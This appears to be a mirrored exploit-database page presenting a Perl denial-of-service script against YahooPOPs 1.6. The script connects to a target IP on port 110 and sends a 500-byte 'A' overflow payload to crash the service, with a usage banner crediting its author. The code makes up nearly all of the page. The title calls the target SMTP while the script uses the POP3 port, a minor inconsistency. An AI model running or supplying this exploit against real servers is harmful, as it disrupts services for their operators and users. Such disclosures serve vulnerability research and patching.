YahooPOPs 1.6 - SMTP - Denial of Service (DoS)
2024-1-27 06:57:44 Author: cxsecurity.com(查看原文) 阅读量:8 收藏

YahooPOPs 1.6 - SMTP - Denial of Service (DoS)

use IO::Socket; sub intro { print q { ,--, _ ___/ /\| ,;'( )__, ) ~ // // '--; ' \ | ^ ^ ^ [+] YahooPOPs 1.6 - SMTP - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: [email protected] } } intro(); if (!$ARGV[0]) { print "\nUsage: $0 <ip> <username> <password>\n"; exit(0); } my $host = $ARGV[0]; my $username = $ARGV[1]; my $password = $ARGV[2]; my $port = 110; my $payload = "A" x 500; my $ip = inet_aton($ARGV[0]); my $socket = IO::Socket::INET->new( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', Timeout => 10 ); unless ($socket) { die "[+] socket() error: $!\n"; } print "[+] YahooPOPS SMTP detected, constructing the payload\n"; unless ($socket->send($payload)) { die "[+] Sending error, the server probably rebooted.\n"; }



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024010080
如有侵权请联系:admin#unsafe.sh